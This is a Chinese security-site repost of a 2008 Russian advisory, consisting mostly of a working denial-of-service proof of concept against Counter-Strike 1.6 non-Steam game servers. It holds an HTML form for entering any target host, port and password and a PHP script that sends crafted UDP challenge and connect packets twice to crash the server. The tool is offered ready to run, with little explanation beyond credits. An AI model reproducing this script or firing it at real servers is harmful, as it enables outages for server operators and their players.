首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Half-Life CSTRIKE Server 1.6 Denial of Service Exploit (no-steam) 来源：underwater@itdefence.ru 作者：Maxim 发布时间：2008-01-07   ----[  Counter Strike 1.6 Denial Of Service POC ... ITDefence.ru Antichat.ru ] Counter Strike 1.6 Denial Of Service POC Eugene Minaev underwater@itdefence.ru Bug was found by Maxim Suhanov ( THE FUF ) works only with no-steam servers ___________________________________________________________________ ____/  __ __ _______________________ _______  _______________    \  \   \ / .\  /  /_// //              /        \       \/      __       \   /__/   / / /     /_//              /\        /       /      /         /     /___/ \/        /              / /       /       /\     /         /         / /        /               \/       /       / /    /         /__       //\ \       /    ____________/       /        \/    __________// /__    // /   /\\      \_______/        \________________/____/  2007    /_//_/   // //\ \ \\                                                               // // / .\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . . \_\\________[________________________________________]_________//_//_/ . . <html> <head> <title>Counter Strike DOS POC (underwater@itdefence.ru) </title> <style type="text/css"> input { width: 150px; } td { font-size: 12px; font-family: Verdana, "Trebuchet MS"; text-align: left; } span.err { color: red; } span.ok { color: green; } </style> </head> <body onload="checkpass()"> <div style="width: 210px; margin: auto;"> <form name="csform" method="post" action="cs.php"> <table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;"> <tr> <td style="width: 50px;">Host</td> <td colspan="2"><input name="host" type="text" value=""/></td> </tr> <tr> <td>Port</td> <td colspan="2"><input name="port" type="text" value=""/></td> </tr> <tr> <td>&nbsp;</td> <td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td> <td>Auth Type 2</td> </tr> <tr> <td>Pass</td> <td colspan="2"><input name="pass" type="text" value="" /></td> </tr> <tr> <td>&nbsp;</td> <td colspan="2"><input type="submit" Value="Run"/></td> </tr> </table> <br/> </form> </div> <center>ITDEFENCE / RUSSIA (http://itdefence.ru)<br> </body> </html> <?php /* CS-dos exploit made by underwater Bug was discovered by .FUF  Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server [IMG]http://www.softoplanet.ru/style_emoticons/default/biggrin.gif[/IMG] ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su */ ini_set("display_errors","0"); function HELLO_PACKET() { $packet = pack("H*","FFFFFFFF"); $packet .= "TSource Engine Query"; $packet .= pack("H*","00"); return $packet; } function CHALLENGE_PACKET() { $packet = pack("H*","FFFFFFFF"); $packet .= "getchallenge valve"; $packet .= pack("H*","00"); return $packet; } function LOGIN_PACKET_4() { global $cookie; global $password; $packet = pack("H*","FFFFFFFF"); $packet .= "connect 47 "; $packet .= $cookie.' "'; $packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "'; $packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod'; $packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass'; $packet .= 'word\\'.$password; $packet .= pack("H*","220A0000EE02"); return $packet; } function LOGIN_PACKET_2() { global $cookie; global $password; $packet = pack("H*","FFFFFFFF"); $packet .= "connect 47 "; $packet .= $cookie.' "'; $packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott'; $packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam'; $packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass'; $packet .= 'word\\'.$password; $packet .= pack("H*","22"); return $packet; } function dowork($host,$port,$password,$auth) { global $password; global $cookie; # connecting to target host $fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2); if (!$fsock) die ($errstr); else { # sending hello packet fwrite ($fsock,HELLO_PACKET()); fread ($fsock,100); # sending chalennge packet fwrite ($fsock,CHALLENGE_PACKET()); # recieving cookies $resp = fread($fsock,100); # grab cookies from packet $cookie = substr($resp,strpos($resp,"A00000000")+10); $cookie = substr($cookie,0,strpos($cookie," ")); # sending login packet if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2()); $resp = fread($fsock,100); } } IF (isset($_POST['host']) && isset($_POST['port'])) { IF (empty($_POST['pass'])) $password = "123"; else $password = $_POST['pass']; $fserver = $_POST['host']; $fport = $_POST['port']; if (isset($_POST['auth'])) $fauth = true;else $fauth=false; # we have to connect 2 times $result = dowork($fserver,$fport,$password,$fauth); $result = dowork($fserver,$fport,$password,$fauth); # parsing result echo "Exploit Sent"; } ?> ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·DCP-Portal <= 6.11 Remote SQL ·FlexBB <= 0.6.3 Cookies Remote ·Site@School <= 2.3.10 Remote B ·Eggblog <= 3.1.0 Cookies Remot ·MyPHP Forum <= 3.0 (Final) Rem ·ClamAV 0.91.2 libclamav MEW PE ·DivX Player 6.6.0 ActiveX SetP ·Microsoft DirectX SAMI File Pa ·WebPortal CMS <= 0.6.0 (index. ·PHP Webquest 2.6 (id_actividad ·Vantage Linguistics AnswerWork ·Move Networks Quantum Streamin   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved